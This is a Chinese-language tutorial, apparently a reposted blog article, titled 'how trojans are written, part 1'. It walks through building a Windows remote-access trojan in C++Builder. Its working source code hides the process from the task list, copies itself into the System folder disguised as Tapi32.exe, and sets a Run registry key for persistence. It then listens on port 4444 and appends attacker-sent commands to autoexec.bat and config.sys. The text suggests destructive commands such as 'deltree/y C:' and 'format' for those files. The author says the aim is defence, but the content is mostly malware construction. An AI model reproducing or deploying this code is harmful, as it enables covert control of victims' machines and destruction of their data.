zoukankan      html  css  js  c++  java
  • 木马是如何编写的(一)

    特洛依木马这个名词大家应该不陌生,自从98年“死牛崇拜”黑客小组公布Back Orifice以来,木马犹如平地上的惊雷, 使在Dos——Windows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒,终于认识到的网络也有它邪恶的一面,一时间人心惶惶。 我那时在《电脑报》上看到一篇文章,大意是一个菜鸟被人用BO控制了,吓得整天吃不下饭、睡不着觉、上不了网,到处求救!要知道,木马(Trojan) 的历史是很悠久的:早在AT&T Unix和BSD Unix十分盛行的年代,木马是由一些玩程式(主要是C)水平很高的年轻人(主要是老美)用 C或Shell语言编写的,基本是用来窃取登陆主机的口令,以取得更高的权限。那时木马的主要方法是诱骗——先修改你的.profile文件,植入木马; 当你登陆时将你敲入的口令字符存入一个文件,用Email的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版Dos的熏陶下长大的,对网络可以说很陌生。直到Win9x横空出世,尤其是WinNt的普及,大大推动了网络事业的发展的时候,BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马(甚至在Win9x的“关闭程序”对话框可以看到进程)给了当时中国人极大的震撼,它在中国的网络安全方面可以说是一个划时代的软件。 自己编写木马,听起来很Cool是不是?!木马一定是由两部分组成——服务器程序(Server)和客户端程序(Client),服务器负责打开攻击的道路,就像一个内奸特务;客户端负责攻击目标,两者需要一定的网络协议来进行通讯(一般是TCP/IP协议)。为了让大家更好的了解木马攻击技术,破除木马的神秘感,我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马,使大家能更好地防范和查杀各种已知和未知的木马。 首先是编程工 具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi,这里我们选用C++Builder(以下简称BCB);VC虽然好,但 GUI设计太复杂,为了更好地突出我的例子,集中注意力在木马的基本原理上,我们选用可视化的BCB;Delphi也不错,但缺陷是不能继承已有的资源 (如“死牛崇拜”黑客小组公布的BO2000源代码,是VC编写的,网上俯拾皆是);VB嘛,谈都不谈——难道你还给受害者传一个1兆多的动态链接库——Msvbvm60.dll吗? 启动C++Builder 5.0企业版,新建一个工程,添加三个VCL控件:一个是Internet页中的Server Socket,另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序,可以对外服务(对 攻击者敞开大门)。Socket最初是在Unix上出现的,后来微软将它引入了Windows中(包括Win98和WinNt);后两个控件的作用是用来 使程序具有FTP(File Transfer Protocol文件传输协议)和 SMTP(Simple Mail Transfer Protocol简单邮件传输协议)功能,大家一看都知道是使软件具有上传下载功能和发邮件功能的 控件。 Form窗体是可视的,这当然是不可思议的。不光占去了大量的空间(光一个Form就有300K之大),而且使软件可见,根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form,就像Delphi用过程实现的小程序一般只有17K左右那样。 我们首先应该让我们的程序能够隐身。双击Form,首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。这看 起来很神秘,其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。 因此,只要将我们的程序在进程数据库中用RegisterServiceProcess()函数注册成服务进程(Service Process)就可以了。不过该函数的声明在Borland预先打包的头文件中没有,那么我们只好自己来声明这个位于KERNEL32.DLL中的鸟函数了。 首先判断目标机的操作系统是Win9x还是WinNt: { DWORD dwVersion = GetVersion(); // 得到操作系统的版本号 if (dwVersion >= 0x80000000) // 操作系统是Win9x,不是WinNt { typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD); //定义RegisterServiceProcess()函数的原型 HINSTANCE hDLL; LPREGISTERSERVICEPROCESS lpRegisterServiceProcess; hDLL = LoadLibrary("KERNEL32"); //加载RegisterServiceProcess()函数所在的动态链接库KERNEL32.DLL lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess"); //得到RegisterServiceProcess()函数的地址 lpRegisterServiceProcess(GetCurrentProcessId(),1); //执行RegisterServiceProcess()函数,隐藏本进程 FreeLibrary(hDLL); //卸载动态链接库 } } 这样就终于可以隐身了(害我敲了这么多代码!)。为什么要判断操作系统呢?因为WinNt中的进程管理器可以对当前进程一览无余,因此没必要在WinNt下也使用以上代码(不过你可以使用其他的方法,这个留到后面再讲)。 接着再将自己拷贝一份到%System%目录下,例如:C:\Windows\System,并修改注册表,以便启动时自动加载: { char TempPath[MAX_PATH]; //定义一个变量 GetSystemDirectory(TempPath ,MAX_PATH); //TempPath是system目录缓冲区的地址,MAX_PATH是缓冲区的大小,得到目标机的System目录路径 SystemPath=AnsiString(TempPath); //格式化TempPath字符串,使之成为能供编译器使用的样式 CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE); //将自己拷贝到%System%目录下,并改名为Tapi32.exe,伪装起来 Registry=new TRegistry; //定义一个TRegistry对象,准备修改注册表,这一步必不可少 Registry->RootKey=HKEY_LOCAL_MACHINE; //设置主键为HKEY_LOCAL_MACHINE Registry->OpenKey("Software\\Microsoft\\Windows\\ CurrentVersion\\Run",TRUE); //打开键值Software\\Microsoft\\Windows\\CurrentVersion\\Run,如果不存在,就创建之 try { //如果以下语句发生异常,跳至catch,以避免程序崩溃 if(Registry->ReadString("crossbow")!=SystemPath+"\\Tapi32.exe") Registry->WriteString("crossbow",SystemPath+"\\Tapi32.exe"); //查找是否有“crossbow”字样的键值,并且是否为拷贝的目录%System%+Tapi32.exe //如果不是,就写入以上键值和内容 } catch(...) { //如果有错误,什么也不做 } } 好,FormCreate过程完成了,这样每次启动都可以自动加载Tapi32.exe,并且在“关闭程序”对话框中看不见本进程了,木马的雏形初现。 接着选中ServerSocket控件,在左边的Object Inspector中将Active改为true,这样程序一启动就打开特定端口,处于服务器工作状态。再将Port填入4444,这是木马的端口号,当然你也可以用别的。但是你要注意不要用1024以下的低端端口,因为这样不但可能会与基本网络协议使用的端口相冲突,而且很容易被发觉,因此尽量使用1024以上的高端端口(不过也有这样一种技术,它故意使用特定端口,因为如果引起冲突,Windows也不会报错 ^_^)。你可以看一看TNMFTP控件使用的端口,是21号端口,这是FTP协议的专用控制端口(FTP Control Port);同理TNMSMTP的25号端口也是SMTP协议的专用端口。 再选中ServerSocket控件,点击Events页,双击OnClientRead事件,敲入以下代码: { FILE *fp=NULL; char * content; int times_of_try; char TempFile[MAX_PATH]; //定义了一堆待会儿要用到的变量 sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win369.BAT")).c_str()); //在%System%下建立一个文本文件Win369.bat,作为临时文件使用 AnsiString temp=Socket->ReceiveText(); //接收客户端(攻击者,也就是你自己)传来的数据 } 好,大门敞开了!接着就是修改目标机的各种配置了!^_^ 首先我们来修改Autoexec.bat和Config.sys吧: { if(temp.SubString(0,9)=="edit conf") //如果接受到的字符串的前9个字符是“edit conf” { int number=temp.Length(); //得到字符串的长度 int file_name=atoi((temp.SubString(11,1)).c_str()); //将第11个字符转换成integer型,存入file_name变量 //为什么要取第11个字符,因为第10个字符是空格字符 content=(temp.SubString(12,number-11)+'\n').c_str(); //余下的字符串将被作为写入的内容写入目标文件 FILE *fp=NULL; char filename[20]; chmod("c:\\autoexec.bat",S_IREAD|S_IWRITE); chmod("c:\\config.sys",S_IREAD|S_IWRITE); //将两个目标文件的属性改为可读可写 if(file_name==1) sprintf(filename,"%s","c:\\autoexec.bat"); //如果第11个字符是1,就把Autoexec.bat格式化 else if(file_name==2) sprintf(filename,"%s","c:\\config.sys"); //如果第11个字符是1,就把Config.sys格式化 times_of_try=0; //定义计数器 while(fp==NULL) { //如果指针是空 fp=fopen(filename,"a+"); //如果文件不存在,创建之;如果存在,准备在其后添加 //如果出错,文件指针为空,这样就会重复 times_of_try=times_of_try+1; //计数器加1 if(times_of_try>100) { //如果已经试了100次了,仍未成功 Socket->SendText("Fail By Open File"); //就发回“Fail By Open File”的错误信息 goto END; //跳至END处 } } fwrite(content,sizeof(char),strlen(content),fp); //写入添加的语句,例如deltree/y C:或者format/q/autotest C:,够毒吧?! fclose(fp); //写完后关闭目标文件 Socket->SendText("Sucess"); //然后发回“Success”的成功信息 } } 你现在可以通过网络来察看目标机上的这两个文件了,并且还可以向里面随意添加任何命令。呵呵,这只不过是牛刀小试罢了。朋友,别走开!(未完待续)
  • 相关阅读:
    2020.10.23 19级training 补题报告
    2020.10.17 天梯赛练习 补题报告
    2020.10.16 19级training 补题报告
    2020.10.9 19级training 补题报告
    2020.10.10 天梯赛练习 补题报告
    2020.10.3 天梯赛练习 补题报告
    2020.10.2 19级training 补题报告
    第十届山东省ACM省赛复现补题报告
    VVDI Key Tool Plus Adds VW Passat 2015 Key via OBD
    Xhorse VVDI Prog Software V5.0.3 Adds Many MCUs
  • 原文地址:https://www.cnblogs.com/adodo1/p/4327798.html
Copyright © 2011-2022 走看看